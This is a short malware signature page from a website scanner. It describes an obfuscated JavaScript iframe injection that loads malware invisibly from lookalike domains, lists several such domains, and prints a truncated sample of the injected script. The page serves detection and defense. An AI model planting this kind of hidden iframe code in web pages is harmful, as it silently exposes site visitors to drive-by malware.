SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd20

malware-entry-mwiframehd20

Description:

We detected an iframe injection using javascript to hide is presence. It is a common form of malware injection and we are seeing multiple domains being used as intermediaries, including:


microsof.cn
trughtsa.com
updatedate.cn

And a few other domains. This is used to load malware from external web sites while not being visible to the user.

Affecting: Any web site (no specific CMS targeted).

Malware dump (sample of malware):

<script>document.write ("<"+ 'if'+' '+'ra'+''+"me"+' sr'+"c="ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"" wid"+' '+"th=1 h"+"eigh"+''+'t'+"="+"2>/i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><s...